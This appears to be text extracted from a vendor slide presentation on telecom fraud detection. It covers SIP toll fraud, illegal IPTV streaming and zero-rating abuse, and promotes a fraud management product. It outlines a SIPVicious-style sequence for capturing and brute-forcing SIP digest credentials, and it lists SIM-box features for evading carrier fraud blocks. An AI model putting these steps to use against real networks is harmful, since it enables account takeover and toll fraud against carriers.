PEDRO FIDALGO, WEDO TECHNOLOGIES

DAN DEETH, SANDVINE

• FRAUD OVER IP.

• KNOW YOUR ENEMY.

• SIP FRAUD CHALLENGES

• IPTV FRAUD

• ZERO RATED FRAUD

• ADVANCE FRAUD DETECTION IN IP

• MIGRATION FROM CIRCUIT SWITCH TO IP NETWORKS, SIP, LTE.

• FRAUD DETECTION AND INTRUSION DETECTION HAVE BEEN TRADITIONALLY COMPLETELY SEPARATE RESEARCH AREAS.

• MALICIOUS ACTIVITY + POLICY VIOLATIONS +ARTIFICIAL INTELLIGENCE

• Back in 2011, an attacker (or group of

attackers) performed an Internet-wide

scanning event that was orchestrated

by the botnet

• SIP REGISTER request that trying to

register a dummy user and expecting to

receive a 404 Not Found client failure

response.

• In less than 12 days they were able to

query 4,000,000,000 IP addresses,

which equated to practically

every IPv4 computer on the internet

ANTI-FRAUD DETECTION READY

STEALTH CAPABILITIES

• Port Inter-Calling

• Fake Ring-Back

• Proxy Encryption for IP Block

• Dynamic Allocation and Rotation of Sim

Cards

• IMEI Change

• Internet Data simulation

• BTS Change and Lock

• Carrier Selection

• Sim Bank / Sim Server

ANTI BLOCKING

• Accumulated Duration and Calls

• Consecutive Failed, No Answer, Short

Duration Calls

FEATURES

• Up to 128 Channels

• GSM/CDMA/WCDMA/LTE Frequency’s

• GoIP (SIP and H323)

• Automatic Recharge

SECURITY

• End to End encryption is not ensured since intermediate

SIP servers need to examine and change certain fields of

the SIP messages.

• It only protects a few SIP fields, leaves other important

SIP fields (e.g., SDP, From, To) unprotected

• SIP Messages between SIP Server and UA are in clear

text ,vulnerable to MITM.

• User Agents are required to Authenticate to SIP Servers

but SIP Servers are not required to authenticate to user

agents

• User Agents can be challenged to respond their

credentials. The password is transmitted in MD5 format.

SIP VICIOUS

• Port Scan SIP Port - UDP 5060

• Send a Sip Invite Message (Ghost Call) and Hang Up

• Respond with 407-Proxy-Authentication Msg to the Bye

Msg sent by the user agent

• User agents responds with the password in MD5 format

• Brute Force the MD5 hash containing the password

• Authenticate using the compromised credentials

Sandvine creates a data record for the

selected SIP messages and transmits

it to WeDo.

If WeDo determines that fraud is

occurring it will use the RAID Integrated

Case Management automated workflow

to drive the CSP through the appropriate

next steps.

WeDo analyzes the data record with

data FMS and correlates the event with

historical records and subscriber

information e.g. Customer Type ,

account credit.

12 3

The digital service provider receives $0

revenue and intake the costs of

increased capacity. Streaming will run

for 24/7 if IPTV Boxes are nor turned off.

3User subscribes illegal IPTV services

or downloads piracy apps to find links

to premium video streams.

User receives content through streaming

URLs served from the cloud storage

site.

2

1.1 TB A MONTH

8% TV Piracy Users in U.S and Canada

~ 9Million Users

With 4000 Kbps stream each user will consume

$1.1 BILLION A YEAR 1

Unlicensed Video provider sells thousands

of premium channels from 1 day to 1 year

plans. Service can include IPtv boxes

already configured. Data Records are

created identifying users with streaming

flows as well as content providers.

Raid FMS integrates all alarms helping

CSP’s to identify and quantify the total

amount involved in fraud as well as the

ones creating the highest impacts in

terms of capacity .

Raid FMS creates alarms identifying the

users streaming illegal services as well

as the use of anonymizers to

masquerade the traffic12 3

78.5 billion visits in 2015 to worldwide TV

and piracy films , 73.7% vs 17.3% direct-

download sites (Muso 2015)

Zero rating content is part of many

CSP’s offers, it allows unlimited data to

specific apps, services or websites

These apps are available in the official

store and advertise themselves as tools

to “surf the internet privately and

securely”

Fraudsters use techniques such as Http

Header Injection, Domain Fronting and

DNS Spoofing to disguise data traffic to

make it look as the free data offer.

These apps are available in the official

store and advertise themselves as tools

to “surf the internet privately and

securely”

Fraudsters use techniques such as Http

Header Injection, Domain Fronting and

DNS Spoofing to disguise data traffic to

make it look as the free data offer.

Currently there are 283 VPN like apps

in Google Store

Traffic classification, using deterministic

or signature techniques are used to

identify connections to Psiphon

servers. A data record is transmits to

WeDo

CSPs using the inherit capabilities of

Advance Case Management will be able

to determine the most effective actions

to reduce the Fraud impact.

Raid FMS will cross the events with

historical and behavioral norms

providing additional context to the event.

Alarms can be grouped into multiple

categories providing the CSPs an

holistic view on the fraud impact and

most employed techniques.

12

3

Subscribers exploiting the zero-

rating of a subscriber portal

consumed 300% more than the

average user, impacting,

“THANK YOU”

W O R L DW IDE L E A D E RS HI P I N R E V E N U E A S S U R A NCE

A N D F R A U D M A N A G EM EN T S O F TW A RE